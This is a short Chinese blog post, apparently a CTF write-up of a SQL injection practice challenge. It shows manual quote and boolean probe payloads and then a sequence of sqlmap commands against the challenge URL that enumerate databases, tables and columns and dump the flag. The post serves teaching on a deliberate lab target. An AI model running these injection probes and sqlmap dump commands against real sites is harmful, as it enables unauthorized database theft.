简单的sql注入3
2024-10-20 08:55:38
仍然
1
1’
1”
发现1’报错了。。。。。我觉得作者对’情有独钟
再试试
1#
1’#
1”#
发现都可以正常登录
试试1' and '1'='1和1' and '1'='2发现成功登录和不成功登录的区别在于显示hello不,这里并不会输出id= name=
所以这里应该是个报错型盲注
所以这里就不浪费时间了,直接使用sqlmap
使用
sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1"
打开开口
sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs
查看数据库表名称
sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --tables
查询表下的列名称
sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --columns -T flag
查询列下的flag类型
sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -C flag -T flag --dump
查看flag的信息
最新文章
- WPF中弹出菜单
- mysql 总结二(自定义函数)
- html5中的clip
- haproxy.cfg
- CXF(2.7.10) - WSDL2Java generated Client
- Media Queries for Standard Devices
- [置顶] js中如何复制一个对象,如何获取所有属性和属性对应的值
- asp.net 开发 sql server 转 oracle
- Linux查看非root运行的进程
- java基础-jdk工具包
- day06深浅拷贝,元组,字典,集合
- shell 脚本的编写
- 返回JSON格式(二十五)
- HBase数据库集群配置【转】
- Boost StateChart实现状态机----秒表例程
- [Android Security] 如何把java代码转换成smali代码
- Max_connect_errors – MySQL性能参数详解
- 3D动态人脸识别技术分析——世纪晟人脸识别实现三维人脸建模
- 移动应用安全开发指南(Android)--数据存储
- 使用axis2进行webservice发布与调用
热门文章
- Flink基础概念入门
- Elasticsearch:Pinyin 分词器
- RDS MySQL内存管理
- Zookeeper QuickStart
- secureCRT登录ubuntu 报错:`No compatible key-exchange method. The server supports these methods: diffie-hellman`
- 多云容器编排 Karmada-Operator 实践
- 我操作MySQL的惊险一幕
- NOI2015 洛谷P1955 程序自动分析(并查集+离散化)
- NOI2011阿狸的打字机
- 齐博X1忘记管理员密码了怎么办?如何强制进后台?